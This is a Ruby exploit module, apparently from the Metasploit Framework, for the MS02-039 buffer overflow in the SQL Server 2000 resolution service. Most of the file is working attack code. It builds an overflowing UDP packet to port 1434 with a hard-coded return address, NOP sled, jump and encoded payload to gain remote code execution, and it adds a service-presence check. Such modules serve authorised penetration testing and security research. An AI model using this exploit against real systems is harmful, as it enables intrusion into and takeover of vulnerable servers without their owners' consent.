GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/mssql/ms02_039_slammer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::MSSQL

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS02-039 Microsoft SQL Server Resolution Overflow',
      'Description'    => %q{
        This is an exploit for the SQL Server 2000 resolution
        service buffer overflow. The overflow is triggered by
        sending a UDP packet to port 1434 that starts with 0x04 and
        is followed by a long string terminating with a colon and a
        number. This module should work against any vulnerable SQL
        Server 2000 or MSDE install (pre-SP3).
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2002-0649'],
          [ 'OSVDB', '4578'],
          [ 'BID', '5310'],
          [ 'MSB', 'MS02-039'],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'           => 512,
          'BadChars'        => "\x00\x3a\x0a\x0d\x2f\x5c",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [
            'MSSQL 2000 / MSDE <= SP2',
            {
              'Platform' => 'win',
              'Ret'      => 0x42b48774,
            },
          ],
        ],
      'Platform'       => 'win',
      'DisclosureDate' => '2002-07-24',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(1434)
      ])
  end

  # Sends the 0x02 SSRP ping (mssql_ping) and reports Detected if the
  # service answers; the ping does not tell SP2 from SP3, so this is a
  # presence check, not a vulnerability check.
  def check
    info = mssql_ping
    if (info['ServerName'])
      print_status("SQL Server Information:")
      info.each_pair { |k,v|
        # ljust avoids a negative repeat count for keys longer than 15 chars
        print_status(" #{k.ljust(15)} = #{v}")
      }
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit

    connect_udp
    print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
    print_status("Execute 'net start sqlserveragent' once access is obtained")

    # \x68:888 => push dword 0x3838383a
    # The trailing ":888" is the colon-and-number terminator the
    # resolution service expects, so the copy runs to the end of the buffer.
    buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"

    # Return to the stack pointer
    buf[ 97, 4] = [target.ret].pack('V')

    # Which lands right here
    buf[101, 6] = make_nops(6)

    # Jumps 8 bytes ahead
    buf[107, 2] = "\xeb\x08"

    # Write to thread storage space to avoid a crash
    buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')

    # And finally into the payload
    buf[117,payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    disconnect_udp
    handler
  end
end